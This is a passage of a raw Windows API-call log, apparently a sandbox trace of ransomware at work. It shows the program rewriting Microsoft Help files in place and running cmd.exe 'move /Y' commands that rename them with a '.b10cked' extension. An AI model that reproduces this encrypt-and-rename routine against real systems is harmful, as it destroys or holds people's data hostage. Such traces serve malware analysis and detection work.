Help\\MS.POWERPNT.14.1033.hxn", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~2\\MSPOWE~1.HXN") returned 0x27 [0198.749] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft Help\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~2\\") returned 0x1b [0198.750] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSPOWE~1.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.POWERPNT.14.1033.hxn.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSPOWE~1.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.POWERPNT.14.1033.hxn.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x1b4, hThread=0x120, dwProcessId=0xe48, dwThreadId=0xfe4)) returned 1 [0198.760] CloseHandle (hObject=0x1b4) returned 1 [0198.760] CloseHandle (hObject=0x120) returned 1 [0198.760] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft Help\\", cchLength=0x22 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\") returned 0x22 [0198.760] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft Help\\", cchLength=0x22 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\") returned 0x22 [0198.760] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\", cchCount1=34, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\", cchCount2=34) returned 2 [0198.760] WaitForSingleObject 
(hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0198.760] ReleaseMutex (hMutex=0xf8) returned 1 [0198.760] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0198.760] ReleaseMutex (hMutex=0xf8) returned 1 [0198.760] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0198.760] ReleaseMutex (hMutex=0xf8) returned 1 [0198.760] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0198.761] ReleaseMutex (hMutex=0xf8) returned 1 [0198.761] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.powerpnt.dev.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0198.761] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.761] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x170 [0198.761] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.761] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=25555014786) returned 1 [0198.761] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.761] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x170 [0198.761] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 
[0198.761] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.761] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x170 [0198.761] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.761] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0198.761] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x170 [0198.761] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0198.761] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.761] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x170 [0198.761] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.761] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.762] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x170 [0198.762] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: 
lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.762] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.762] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x170 [0198.762] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.762] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.762] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x170 [0198.762] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.762] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.762] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x170 [0198.762] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.762] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.762] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x170 [0198.762] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, 
dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.762] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0198.762] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x170 [0198.762] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0198.762] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0198.762] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0198.762] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x170 [0198.762] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0198.762] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0198.763] ReadFile (in: hFile=0x120, lpBuffer=0x12ea7f8, nNumberOfBytesToRead=0xb7, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x12ea7f8*, lpNumberOfBytesRead=0x12ec08*=0xb7, lpOverlapped=0x0) returned 1 [0198.764] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0198.764] WriteFile (in: hFile=0x120, lpBuffer=0x12ea7f8*, nNumberOfBytesToWrite=0xb7, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x12ea7f8*, 
lpNumberOfBytesWritten=0x12ec1c*=0xb7, lpOverlapped=0x0) returned 1 [0198.764] SetFilePointer (in: hFile=0x120, lDistanceToMove=-183, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xb9 [0198.764] ReadFile (in: hFile=0x120, lpBuffer=0x12ea7f8, nNumberOfBytesToRead=0xb7, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x12ea7f8*, lpNumberOfBytesRead=0x12ec08*=0xb7, lpOverlapped=0x0) returned 1 [0198.764] SetFilePointer (in: hFile=0x120, lDistanceToMove=-183, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xb9 [0198.764] WriteFile (in: hFile=0x120, lpBuffer=0x12ea7f8*, nNumberOfBytesToWrite=0xb7, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x12ea7f8*, lpNumberOfBytesWritten=0x12ec1c*=0xb7, lpOverlapped=0x0) returned 1 [0198.768] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.POWERPNT.DEV.14.1033.hxn", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0198.768] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.POWERPNT.DEV.14.1033.hxn", cchWideChar=27, lpMultiByteStr=0x132f75c, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MS.POWERPNT.DEV.14.1033.hxn", lpUsedDefaultChar=0x0) returned 27 [0198.768] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x170 [0198.768] WriteFile (in: hFile=0x120, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0198.768] CloseHandle (hObject=0x120) returned 1 [0198.769] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft 
Help\\MS.POWERPNT.DEV.14.1033.hxn", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~2\\MSPOWE~2.HXN") returned 0x27 [0198.769] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft Help\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~2\\") returned 0x1b [0198.770] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSPOWE~2.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.POWERPNT.DEV.14.1033.hxn.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSPOWE~2.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.POWERPNT.DEV.14.1033.hxn.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x1b4, hThread=0x120, dwProcessId=0xf58, dwThreadId=0xfec)) returned 1 [0198.784] CloseHandle (hObject=0x1b4) returned 1 [0198.784] CloseHandle (hObject=0x120) returned 1 [0198.784] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft Help\\", cchLength=0x22 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\") returned 0x22 [0198.784] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft Help\\", cchLength=0x22 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\") returned 0x22 [0198.784] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\", cchCount1=34, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\", cchCount2=34) returned 2 [0198.784] 
WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0198.784] ReleaseMutex (hMutex=0xf8) returned 1 [0198.784] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0198.784] ReleaseMutex (hMutex=0xf8) returned 1 [0198.784] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0198.784] ReleaseMutex (hMutex=0xf8) returned 1 [0198.784] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0198.784] ReleaseMutex (hMutex=0xf8) returned 1 [0198.785] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft Help\\MS.SETLANG.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.setlang.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0198.785] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.785] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x152 [0198.785] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.785] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=25557410727) returned 1 [0198.785] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.785] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x152 [0198.785] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 
0x0 [0198.785] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.785] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x152 [0198.785] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.785] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0198.785] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x152 [0198.785] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0198.785] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.785] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x152 [0198.785] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.785] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.785] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x152 [0198.786] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: 
lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.786] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.786] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x152 [0198.786] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.786] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.786] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x152 [0198.786] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.786] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.786] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x152 [0198.786] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.786] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.786] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x152 [0198.786] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, 
dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.786] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0198.786] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x152 [0198.786] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0198.786] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0198.786] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0198.786] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x152 [0198.786] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0198.786] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0198.786] ReadFile (in: hFile=0x120, lpBuffer=0x1300e58, nNumberOfBytesToRead=0xa8, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1300e58*, lpNumberOfBytesRead=0x12ec08*=0xa8, lpOverlapped=0x0) returned 1 [0198.788] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0198.788] WriteFile (in: hFile=0x120, lpBuffer=0x1300e58*, nNumberOfBytesToWrite=0xa8, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1300e58*, 
lpNumberOfBytesWritten=0x12ec1c*=0xa8, lpOverlapped=0x0) returned 1 [0198.788] SetFilePointer (in: hFile=0x120, lDistanceToMove=-168, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xaa [0198.788] ReadFile (in: hFile=0x120, lpBuffer=0x1300e58, nNumberOfBytesToRead=0xa8, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1300e58*, lpNumberOfBytesRead=0x12ec08*=0xa8, lpOverlapped=0x0) returned 1 [0198.788] SetFilePointer (in: hFile=0x120, lDistanceToMove=-168, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xaa [0198.788] WriteFile (in: hFile=0x120, lpBuffer=0x1300e58*, nNumberOfBytesToWrite=0xa8, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1300e58*, lpNumberOfBytesWritten=0x12ec1c*=0xa8, lpOverlapped=0x0) returned 1 [0199.087] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.SETLANG.14.1033.hxn", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0199.087] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.SETLANG.14.1033.hxn", cchWideChar=22, lpMultiByteStr=0x1328794, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MS.SETLANG.14.1033.hxn", lpUsedDefaultChar=0x0) returned 22 [0199.087] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x152 [0199.087] WriteFile (in: hFile=0x120, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0199.087] CloseHandle (hObject=0x120) returned 1 [0199.123] 